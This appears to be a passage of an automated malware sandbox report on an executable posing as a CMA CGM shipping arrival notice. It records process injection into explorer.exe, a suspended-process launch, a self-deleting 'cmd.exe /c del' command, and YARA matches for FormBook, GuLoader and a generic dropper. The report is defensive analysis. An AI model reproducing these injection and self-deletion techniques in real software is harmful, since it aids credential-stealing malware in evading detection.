Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3424
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: explorer.exe, 0000000D.00000000.1212057520.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe PID: 6396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5228, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY